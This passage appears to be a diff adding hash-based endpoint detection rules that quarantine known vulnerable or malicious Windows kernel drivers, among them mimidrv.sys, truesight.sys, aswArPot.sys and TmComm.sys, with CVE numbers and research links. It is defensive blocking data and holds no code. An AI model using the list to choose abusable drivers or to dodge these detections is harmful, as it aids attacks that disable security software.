+ "creation_date": "2026-03-23T11:45:31.826298Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826304Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "56b53c8e746727dbd14fabc55d09c4ddd9d8f6bf2f2f65870128436eaa2bd921",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "150d01b8-8c88-5a7d-933d-b63fef82cc02",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474033Z",
+ "creation_date": "2026-03-23T11:45:30.474036Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474045Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "506ec3e8b28e52be36b89041bbcd9933b7b79eaf8a53594186813d0f60edebc9",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1537d4e2-7032-5295-b9e9-53219a730d0f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809962Z",
+ "creation_date": "2026-03-23T11:45:31.809965Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809974Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d13637f79117ce08698aecc26dd7e2a84f85d83540d2eda6dda8828ac22ce982",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "153f511e-f15b-59ac-b8ae-9fe3e547d4d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820564Z",
+ "creation_date": "2026-03-23T11:45:30.820566Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820571Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "489c02d8102fc401010793d7388b59dc944a2e77cf4179424015cd863701b19b",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15404f1e-c16d-57be-af6f-256f1536565b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468500Z",
+ "creation_date": "2026-03-23T11:45:30.468503Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468512Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9c3857d2959a3eff45eefe43d8ed1c23bd6908ae8a9a7e2e4e402bbf3e6d3ec",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "154b9623-2e26-578e-91c6-d3a64f9a7510",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822564Z",
+ "creation_date": "2026-03-23T11:45:30.822566Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822572Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0bfed811a8ae3fa634372f74f0d70de1e0183612e91f56ae034486571b55b88b",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1560ccbf-6109-526c-9d80-d33e25f73f59",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154726Z",
+ "creation_date": "2026-03-23T11:45:31.154727Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154733Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b43dd0ad0664b038cbb94c4a8282b6f3a0fdd81d311a7960b484895a2846ef1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15758380-ec92-5f05-b781-df1c2385e8cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454623Z",
+ "creation_date": "2026-03-23T11:45:30.454626Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454635Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33bdaf3ab141db0f4c6a2c1f9fb047b4e5c6fa6ddc709d905efdd24c2b43041c",
+ "comment": "Vulnerable Kernel Driver (aka atomicredteamcapcom.sys) [https://www.loldrivers.io/drivers/a02e1801-f6fb-41c3-a782-05fdbed44a3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1578159f-3d46-5dc7-bf47-556106d9ea36",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622793Z",
+ "creation_date": "2026-03-23T11:45:29.622795Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622800Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96a5b3cd7c1a6dda5b6f402e6c35ba535270467f56addc7448dbe4aa78428411",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "157ca590-e633-5fda-88e0-59f7ec2227ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816065Z",
+ "creation_date": "2026-03-23T11:45:31.816069Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816077Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8df573e666344fc1a1212c60c35cd2ab86b131f887c1d6dba74f452b691ae2d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "157ea4da-eb7d-59d0-bd12-089b9ed30283",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820337Z",
+ "creation_date": "2026-03-23T11:45:30.820339Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820345Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a29093d4d708185ba8be35709113fb42e402bbfbf2960d3e00fd7c759ef0b94e", + "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "15824e4d-a332-5e06-9758-09f2e9990ca6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491469Z", + "creation_date": "2026-03-23T11:45:31.491472Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491479Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d367b60a73402c6007a87e274c72e2e7c1a0d8e0f2304550b6a380833e2869c6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"1587cc47-cbd4-51de-bdb7-3eb08867d2d5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466298Z", + "creation_date": "2026-03-23T11:45:30.466301Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466310Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "082a79311da64b6adc3655e79aa090a9262acaac3b917a363b9571f520a17f6a", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "15981c82-3634-5c99-b303-05e8b96b952c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469867Z", + "creation_date": "2026-03-23T11:45:30.469886Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469896Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "261969a99718fc68b576eb7b58dbdf7c7a781c8f4572b7a77a0be0eec4b32dc2", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "159b81ef-6fda-5a96-97c9-47533b1d70bc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822459Z", + "creation_date": "2026-03-23T11:45:30.822461Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822466Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19f89530b8caf720c91c82977132bb1fb2afe695b426b51a1ae1b35570805f32", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "15a8ee87-b2f1-5591-acb9-d68975604258", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977712Z", + "creation_date": "2026-03-23T11:45:29.977714Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977719Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f3efcf47681d9f96afcbc843a241c21a643b173c48270446f6fe634991a57847", + "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "15b47584-370d-5500-886a-85b11f589c90", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143429Z", + "creation_date": "2026-03-23T11:45:32.143432Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143437Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f9418b5e90a235339a4a1a889490faca39cd117a51ba4446daa1011da06c7ecd", + "comment": "Vulnerable Kernel Driver (aka GPU-Z.sys) 
[https://www.loldrivers.io/drivers/0d6f1b0f-b94d-4254-b3bb-49de61246260/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "15ba9560-f528-5d70-bb3c-9d4b58c08e72", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968580Z", + "creation_date": "2026-03-23T11:45:29.968582Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968587Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "36e3127f045ef1fa7426a3ff8c441092d3b66923d2b69826034e48306609e289", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "15c9c212-ee5a-5437-a41e-ceda62d0aa84", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604538Z", + "creation_date": "2026-03-23T11:45:29.604540Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604545Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0376d4554b4828a7e3721327cb4c9977301c02eb8c50d10d376d3be623d71e3a", + "comment": "Vulnerable Kernel Driver (aka STProcessMonitor.sys) [https://github.com/ANYLNK/STProcessMonitorBYOVD/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "15d0fd27-5812-53ba-a9d1-3bf24cf29c61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468849Z", + "creation_date": "2026-03-23T11:45:30.468852Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468859Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dc732dc22d0521fce33ed9c37359f702c985d2f35bc00209c3a4a076d6ff564d", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "15da0706-be96-50c0-b884-b192e24d2182", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974713Z", + "creation_date": "2026-03-23T11:45:29.974715Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974720Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "886b28af7d2907a61720da0b6ea5d88a9a8512ceb120e88889f3fedd6bf313b4", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "15ff4712-7fef-566f-9e5c-7be664522f3d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973552Z", + "creation_date": "2026-03-23T11:45:29.973554Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973559Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c4207c90c97733fae2a08679d63fbbe94dfcf96fdfdf88406aa7ab3f80ea78f", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "160086d3-7131-5956-a08f-3c7c1c54993b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621298Z", + "creation_date": "2026-03-23T11:45:29.621300Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621306Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8", + "comment": "ASUSTeK vulnerable physmem driver (aka AsIO64.sys) [https://www.loldrivers.io/drivers/79692987-1dd0-41a0-a560-9a0441922e5a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "16137621-a1e4-520b-b398-6845f3c6b427", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826318Z", + "creation_date": "2026-03-23T11:45:30.826320Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826326Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b836d9305dd22387514c2e1507cf36646c11abf088088bc3f7e6ede49113fcdb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "16157b50-8677-5e5a-9679-385642f57acf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 